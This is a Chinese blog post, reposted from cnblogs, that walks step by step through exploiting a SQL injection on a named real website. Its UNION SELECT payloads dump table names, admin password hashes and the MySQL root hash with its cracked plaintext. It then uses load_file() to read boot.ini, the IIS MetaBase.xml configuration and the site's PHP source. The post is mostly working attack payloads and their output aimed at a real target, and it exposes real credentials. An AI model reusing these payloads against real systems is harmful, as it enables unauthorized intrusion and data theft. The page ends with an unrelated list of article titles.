php_mysql注入load_file()IIS配置文件获取

先看一个注入点:

http://www. .cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,concat(database(),0x5c,user(),0x5c,version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
得到回显:flier_dbase\root@localhost\5.0.22-community-nt
如果说注入点算是第一个漏洞,那么这个root就是管理员制造的第二个网站漏洞了
表段:http://www. .cn/news_detail.php?newsid=1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.columns+where+table_schema=0x666C6965725F6462617365
得到数据:pub_config,pub_tree,pub_webmaster,web_img,web_keys,web_ly,web_news,web_news_review
pub_webmaster的字段:‍http://www. .cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+column_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.columns+where+table_name=0x7075625F7765626D6173746572
得到数据:webmasterid,username,userpwd,loginnum,ip,lasttime,tree,name,dtime,sex,jobs
这下出来管理员数据:
http://www. .cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+username,0x5f,userpwd),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+pub_webmaster
得到:admin_9b45d683e499e7bd
yfh_7a57a5a743894a0e//这里是第三个漏洞了,弱口令admin
既然找不到后台地址,那么干脆爆MySql管理员的口令
http://www. .cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,concat(user,password),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
得到数据:root*CB26B0546CADD30FC2432C095A6A3D54FA3C2FFD
数据库就一个账户,如果解不开,岂不是要放弃?那倒不比,第一,咱解开了,对于八位字母数字加符号的密码,学校的分布式密码破解系统毫不吃力的说。不过这个密码是八位字母加符号,也算不的弱口令,暂且不算是漏洞吧。
*CB26B0546CADD30FC2432C095A6A3D54FA3C2FFD对应的明文是qweasd)@
第二,咱还有别的路子,随便访问一个路径,反馈的是IIS6的404默认页,说明网站服务器是:Windows+IIS6+php+MySql的环境
先把c:\\boot.ini这串路径进行hex编码得到:0x633A5C5C626F6F742E696E69
然后、http://www. .cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file(0x633A5C5C626F6F742E696E69),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
看回显:
[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Enterprise" /fastdetect /NoExecute=OptOut
虽然能load_file加载文件,但是似乎用处不大。非也非也,既然是IIS6,那么加载c:\\windows\\system32\\inetsrv\\MetaBase.xml这个路径就可以获取网站配置信息了。
*注:Windows进行文件操作,路径一定要是双斜杠,如果是单斜杠,八成会load_file失败,探讨其原因,可能是因为,斜杠是这样的\左上右下,而Linux则是/右上左下。如果在Windows的路径斜杠后面跟个t也就是\t,看看在编程里面是什么?如果\n呢?\'呢?没错,路径的斜杠就没了。如果是双斜杠,\\那才是真的单斜杠。如果你需要输出双斜杠,那么你要用四个斜杠来表示,郁闷不?\\\\
最后注入句就是:http://www.fly-er.com.cn/news_detail.php?newsid=- 1+union+select+1,2,3,4,5,6,load_file(0x633A5C5C77696E646F77735C5C73797374656D33325C5C696E65747372765C5C4D657461426173652E786D6C),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
得到回显如下:
主要看这几句配置:
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
<IIsWebServer        Location ="/LM/W3SVC/2125961364"
                AuthFlags="0"
                LogExtFileFlags="LogExtFileDate | LogExtFileTime | LogExtFileClientIp | LogExtFileUriStem | LogExtFileUriQuery | LogExtFileHttpStatus | LogExtFileWin32Status | LogExtFileServerPort | LogExtFileUserAgent | LogExtFileHttpSubStatus"
                LogFileDirectory="E:\flylog"
                LogFileLocaltimeRollover="FALSE"
                LogFilePeriod="1"
                LogFileTruncateSize="20971520"
                LogPluginClsid="{FF160663-DE82-11CF-BC0A-00AA006111E0}"
                ServerAutoStart="TRUE"
                ServerBindings=":80:fly-er.com.cn
                        :80:www.fly-er.com.cn"
                ServerComment="fly-er.com.cn"
        >
</IIsWebServer>

还有:
?
1
2
3
4
5
6
7
8
9
10
11
12
<IIsWebVirtualDir        Location ="/LM/W3SVC/2125961364/root"
                AccessFlags="AccessRead | AccessWrite | AccessScript"
                AppFriendlyName="默认应用程序"
                AppIsolated="2"
                AppRoot="/LM/W3SVC/2125961364/Root"
                AuthFlags="AuthAnonymous | AuthNTLM"
                DefaultDoc="yindao.html,index.html,index.php,Default.htm,Default.asp,index.htm"
                DirBrowseFlags="DirBrowseShowDate | DirBrowseShowTime | DirBrowseShowSize | DirBrowseShowExtension | DirBrowseShowLongDate | EnableDefaultDoc"
                Path="F:\web\2010716\new_flyer"
                UNCPassword="49634462500000000600000040000000894077f761d33600623e24d0e5dfbe254f63ee6490a3af6f918760ac2fbd00627e07669149f74641659a4383366f9edefd9c02f6555c8692c1c93d2483008b9721cbdae4fac9a380"
        >
</IIsWebVirtualDir>

这下子我们构造:
http://www.  .cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file(0x463A5C5C7765625C5C323031303731365C5C6E65775F666C7965725C5C696E6465782E706870),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
右键查看源代码就可以了
*注:load_file用的时候,最好在外面加一个hex即:hex(load_file(xxxxxxx))
因为我遇到过一个网站,主页不知道是哪里的代码有问题,注入点在主页。我用主页load_file主页文件,外面没嵌套hex的话,主页就被循 环显示了,就是类似这样:index里面有一个iframe,iframe加载的是index这个文件,index这个文件里面的iframe又加载 index这个文件,循环往复下去,直到把机器资源耗尽。虽然不知道当时那个网站是不是这个iframe,但是这样的嵌套确实有死循环发生,所以建议 hex嵌套load_file
我比较在意的是index里面这样的一个地方的代码:
?
1
2
3
4
5
require('admin_flier/common/function.php');
require('admin_flier/lib/class/form.class.php');
require('admin_flier/lib/class/db.class.php');
require('admin_flier/lib/class/page.class.php');
include('inc/head.php');

呵呵,这里不就是后台地址么?
显然,后台的安全性也不够。就算是隐藏了后台地址,工具扫不到,那也不意味着可以放松后台的安全性吧?

转载于:https://www.cnblogs.com/shsgl/p/4549426.html

php_mysql注入load_file()IIS配置文件获取相关推荐

  1. 你不具备访问 IIS 配置文件的权限。要在 IIS 上打开和创建网站,需要使用 Administrator 帐户运行 Visual Studio。

    visual studio(vs)当前作为微软重要的一个IDE,功能越来越强大了. VS创建的web项目中,是可以直接在vs上运行web程序,是因为vs内置了一个简易型的IIS服务程序,来支持运行网站 ...

  2. 中兴光猫配置文件获取方法

    中兴光猫配置文件获取方法 http://192.168.1.1/manager_dev_config_t.gch 有些配置文件加密了,还不好破解 网上有超级牛帖子,不过想在好像web_shell也关闭 ...

  3. 解决无法注入spring容器,获取不到spring容器中的bean问题

    解决无法注入spring容器,获取不到spring容器中的bean问题 前两天工作中遇到一个问题,收到的需求是根据logbak日志实现通过过滤错误日志发送预警邮件到邮箱,logback自定义实现类如下 ...

  4. IIS配置文件的XML格式不正确

    IIS配置文件的XML格式不正确 在配置IIS服务器的时候出现这问题,猜测是因为日志文件挤满了服务器的磁盘空间.导致服务器的一些程序无法执行,破坏了applicationHost.config文件 解 ...

  5. Spring获取ApplicationContext方式,和读取配置文件获取bean的几种方式

    Spring获取ApplicationContext方式 我自己常用的方法: 读取一个文件1 //创建Spring容器 2 ApplicationContext ctx = new ClassPath ...

  6. Spring中注解注入bean和配置文件注入bean

    注解的方式确实比手动写xml文件注入要方便快捷很多,省去了很多不必要的时间去写xml文件 按以往要注入bean的时候,需要去配置一个xml,当然也可以直接扫描包体,用xml注入bean有以下方法: 1 ...

  7. Spring Boot概述与入门特点配置方式注入方式yim配置文件与多文件配置Spring Boot自动配置原理lombok应用

    1. Spring Boot概述 Spring Boot是Spring项目中的一个子工程,与我们所熟知的Spring-framework 同属于spring的产品: 首页Spring Boot简介可以 ...

  8. SQL注入之利用DNS获取数据

    1.SQL注入 SQL注入一般分为报错注入和盲注,盲注的又分为布尔盲注和时间盲注. 当我们发现一个站点存在一个没有数据回显的注入点进行注入时,只能采取盲注,这种注入速度非常慢,需要一个一个字符猜解,而 ...

  9. SpringBoot的properties和yml两种配置方式, 配置注入参数, 以及配置文件读取失效的问题

    SpringBoot支持两种配置方式,一种是properties文件,一种是yml 首先在pom文件中添加依赖: <dependency><groupId>org.spring ...

最新文章

  1. Linux环境编程--多线程
  2. 饭后半小时养胃黄金期
  3. ExtJs4 笔记(8) Ext.slider 滚轴控件、 Ext.ProgressBar 进度条控件、 Ext.Editor 编辑控件...
  4. SQL server根据值搜表名和字段
  5. spring AOP策略模式使用
  6. 乐观锁的两种实现方式
  7. Spring MVC 生成文件类型响应
  8. Python - 装饰器
  9. CentOS 内核升级的总结
  10. 教你用纯Java实现一个即时通讯系统(附源码)
  11. 用python画分形树的详细解析_基于Python的matplotlib库绘制分形树
  12. 指针c语言求电阻的并联值,计算电阻使之符合要求值,,“简单”的难题!!!...
  13. 写在2012的最后一天
  14. 分布式系统设计时,遵循CAP原则
  15. 计算机网络系统juniper
  16. 深度学习笔记其一:基础知识和PYTORCH
  17. APP中如何判断手机类型
  18. ABAP的OPEN CURSOR语法
  19. 聊天系统服务器,聊天系统服务器
  20. 【JSP笔记02】JSP注释、脚本、表达式、JSP三大指令、JSP七大动作的介绍及使用

热门文章

  1. python爬取微博评论_用 python 爬取微博评论并手动分词制作词云
  2. mysq5.7 主主同步
  3. npm、webpack、vue-cli 快速上手版
  4. Javascript与C#中使用正则表达式
  5. 用户体验——南通大学教务学生管理系统
  6. JAVA求集合中的组合
  7. SCOPE_IDENTITY和@@identity的区别
  8. 一段按页自动滚动文字或图片的Js代码
  9. 设置公共请求参数_基于分布式锁的防止重复请求解决方案(值得收藏)
  10. 移动端阻止body左右偏移